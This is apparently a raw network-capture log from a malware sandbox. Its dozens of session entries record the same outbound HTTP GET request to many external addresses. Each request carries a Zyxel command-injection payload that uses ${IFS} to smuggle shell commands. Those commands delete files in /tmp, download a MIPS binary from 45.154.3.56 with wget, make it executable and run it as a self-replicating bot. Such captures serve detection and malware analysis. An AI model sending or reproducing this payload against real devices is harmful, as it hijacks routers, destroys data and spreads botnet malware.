                        Mar 12, 2024 08:50:35.129395962 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1997192.168.2.145842050.103.175.127443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.129465103 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1998192.168.2.1437276205.102.43.198443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.129494905 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1999192.168.2.143819485.55.162.255443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.129530907 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2000192.168.2.1439466133.34.202.74443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.129585028 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2001192.168.2.1456316149.9.116.89443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.129627943 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2002192.168.2.1444758136.165.228.48443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.129676104 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2003192.168.2.143709090.216.72.135443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.129720926 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2004192.168.2.144505075.47.174.43443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.129757881 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2005192.168.2.1442200186.237.14.251443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.129796028 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2006192.168.2.1433926148.237.155.26443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.129867077 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2007192.168.2.143794883.113.77.250443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.129898071 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2008192.168.2.1447668139.19.83.141443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.129959106 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2009192.168.2.1449346101.139.248.122443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.129987955 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2010192.168.2.1458470149.14.11.207443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.130036116 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2011192.168.2.145970418.31.44.213443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.130093098 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2012192.168.2.1445722152.211.63.58443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.130143881 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2013192.168.2.1442538100.215.138.165443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.130181074 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2014192.168.2.1449696145.70.197.223443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.130243063 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2015192.168.2.144605860.227.50.86443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.130290031 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2016192.168.2.1444012186.135.5.236443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.130328894 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2017192.168.2.145094451.87.144.84443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.130357027 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2018192.168.2.1454514138.160.176.21443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.130402088 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2019192.168.2.1441176119.254.60.68443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.130446911 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2020192.168.2.143324097.194.208.248443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.130486965 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2021192.168.2.145129287.108.121.134443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.130539894 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2022192.168.2.1440074144.206.32.192443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.130584002 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2023192.168.2.144875046.9.224.233443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.130624056 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2024192.168.2.144637678.169.191.58443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.130654097 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2025192.168.2.1456106219.22.238.247443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.130700111 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2026192.168.2.1445684102.229.245.131443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.130728960 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2027192.168.2.1459152115.161.219.30443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.130778074 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2028192.168.2.1439176115.160.94.166443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.130811930 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2029192.168.2.1454162219.161.71.242443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.130877018 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2030192.168.2.1434640139.239.238.52443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.130916119 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2031192.168.2.1443628137.10.176.98443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.130964994 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2032192.168.2.1436640194.81.234.129443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.131002903 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2033192.168.2.1443118186.37.201.74443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.131052971 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2034192.168.2.1435416216.159.194.27443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.131076097 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2035192.168.2.1456378172.52.210.11443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.131131887 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2036192.168.2.1438428122.49.41.71443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.131177902 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2037192.168.2.1455636162.125.235.38443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.131223917 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2038192.168.2.145641662.42.207.162443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.131266117 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2039192.168.2.1446476186.188.119.145443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.131318092 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2040192.168.2.1455338173.253.27.76443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.131340027 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2041192.168.2.1459044198.12.232.214443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.131371975 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2042192.168.2.144259276.238.159.239443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.131433964 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2043192.168.2.1443544170.47.152.246443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.131474018 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2044192.168.2.145040070.166.215.213443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.131527901 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2045192.168.2.1437594209.185.239.32443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.131561041 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2046192.168.2.1448446185.152.242.127443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.131608009 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2047192.168.2.1455892126.164.31.249443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.131670952 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2048192.168.2.1443890159.153.227.68443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.131714106 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2049192.168.2.145722823.41.87.228443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.131766081 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2050192.168.2.1440630117.220.3.193443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.131824970 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2051192.168.2.1435012205.67.249.193443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.131841898 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2052192.168.2.1460910142.183.70.9443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.131902933 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2053192.168.2.1440840138.249.218.235443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.131930113 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2054192.168.2.1437496191.244.104.182443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.131980896 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2055192.168.2.1447246162.128.82.112443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.132042885 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2056192.168.2.14532664.226.74.54443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.132078886 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2057192.168.2.143712048.239.249.185443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.132116079 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2058192.168.2.145245251.43.243.7443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.132174969 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2059192.168.2.144217437.89.181.92443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.132205009 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2060192.168.2.1449882168.253.196.87443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.132230043 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2061192.168.2.1443606173.250.217.30443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.132297039 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2062192.168.2.145208865.210.209.238443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.132319927 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2063192.168.2.1455296223.179.144.210443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.132383108 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2064192.168.2.145064853.149.248.222443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.132405996 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2065192.168.2.143351819.78.97.94443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.132457972 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
